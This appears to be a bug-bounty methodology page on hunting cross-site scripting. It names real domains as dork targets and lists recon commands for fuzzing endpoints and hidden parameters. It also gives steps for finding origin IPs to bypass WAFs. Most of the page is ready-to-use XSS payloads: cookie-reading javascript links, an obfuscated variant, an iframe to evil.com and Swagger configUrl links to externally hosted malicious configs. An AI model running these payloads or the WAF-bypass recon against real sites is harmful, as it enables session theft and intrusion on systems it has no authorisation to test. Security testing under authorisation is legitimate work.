My Hunting Approach Step-2

partners.bigcommerce.com

1

Google Dork for find XSS

site:*.com ext:php | ext:jsp | ext:jspx | ext:asp | ext:aspx | ext:htm | ext:html | ext:do | ext:action inurl:?
site:dell.com inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= | inurl:page= | inurl:year= | inurl:view= | inurl:email= | inurl:type= | inurl:name= | inurl:p= | inurl:callback= | inurl:api_key= | inurl:api= | inurl:password= | inurl:email= | inurl:username= | inurl:id= | inurl:item= | inurl:page_id= | inurl:month= | inurl:list_type= | inurl:url= | inurl:terms= | inurl:categoryid= | inurl:key= | inurl:l= | inurl:error= | inurl:&
site:*.nust.edu.pk ext:php inurl:& | inurl:? | inurl:=
2

Find Disallow Path for Endpoint and Parameter Bruteforcing 

site:dell.com inurl:robots.txt
3

Find Hidden Endpoints 

ffuf -w wordlist/httparchive-wordlist/httparchive_directories_Endpoints.txt.txt -u https://platform.infiniteathlete.aiFUZZ -v -mc 200 -recursion -recursion-depth 3

dirsearch -u https://press.zara.com/ECOMPressSite/ -w html-Endpoints.txt
dirsearch -u https://press.zara.com/ECOMPressSite/ -w html-Endpoints.txt --recursion-status=200
4

Find Hidden Parameters 

Arjun -u https://target.com/endpoint -t 10 -T 10 --disable-redirects 
x8 -u https://target.com/endpoint -w httparchive_parameters.txt --reflected-only
5

Confirm Vulnerable Parameter for Reflected XSS

"><a href=https://bing.com>hacked
'"><a href=https://bing.com>hacked<a href=https://bing.com>hacked
'"><marquee>Hacked_by_asad</marquee>
"><iframe width=500 height=500 src="https://evil.com"></iframe>
"-(alert)(origin)-"
"><img src=x onerror=prompt(2)>
"><svg onload=confirm(1)>
<"onmouseover=(confirm)(origin);"
"><a href=javascript:confirm(document.cookie)>ClickMe
"><a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(document.cookie)>ClickMe
"><input type=hidden oncontentvisibilityautostatechange=alert() style=content-visibility:auto>
6

Create and Customize XSS Payload According WAF and Regex

LogoCross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security AcademyWebSecAcademy
LogoJSFiddle - Code Playgroundjsfiddle.net
7

Find Origin IP for Bypass WAF

https://search.censys.io/
host="mytoken.us.dell.com"

https://en.fofa.info/
host="mytoken.us.dell.com"

https://www.shodan.io/search
hostname:"mytoken.us.dell.com"

curl -i url | head -n 15
nslookup mytoken.us.dell.com
8

Dork for finding Swagger DOM XSS

1
Google Dork
site:domain.com intext:"Swagger UI" | intitle:"Swagger UI"
site:domain.com intext:"swagger ui" intitle:"swagger ui" inurl:?url= 
site:domain.com intext:"swagger ui" intitle:"swagger ui" inurl:?configUrl=
Shodan Dork
http.title:"Swagger UI" hostname:"domain.com"
2
?configUrl=https://jumpy-floor.surge.sh/test.json
?url=https://jumpy-floor.surge.sh/test.yaml
?configUrl=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/config.json
?configUrl=https://gist.githubusercontent.com/zenelite123/af28f9b61759b800cb65f93ae7227fb5/raw/04003a9372ac6a5077ad76aa3d20f2e76635765b/test.json

PreviousMy Hunting Approach on File UploadNextGoogle Dork Recon

Last updated